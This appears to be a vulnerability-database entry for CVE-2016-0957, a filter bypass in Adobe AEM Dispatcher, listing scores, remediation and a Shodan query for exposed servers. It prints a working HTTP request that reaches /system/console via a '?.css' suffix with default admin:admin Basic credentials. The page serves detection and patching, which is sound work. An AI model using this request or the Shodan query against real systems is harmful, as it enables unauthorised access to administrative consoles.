🔙 목록으로 돌아가기

CVE-2016-0957: Adobe AEM Dispatcher <4.15 - Rules Bypass

TitleAdobe AEM Dispatcher <4.15 - Rules Bypass
Authorgeeknik
SeverityHigh
ImpactThe vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions.
RemediationUpgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability.
CVSS Score7.5
EPSS Score0.93186
CVE IDCVE-2016-0957
Shodan Queryhttp.component:"Adobe Experience Manager"http.component:"adobe experience manager"
Tags cve2016 cve adobe aem vuln

🔍 Vulnerability Description

Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.

🌐 HTTP Request

GET /system/console?.css HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic YWRtaW46YWRtaW4K
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-0957.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-0957.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A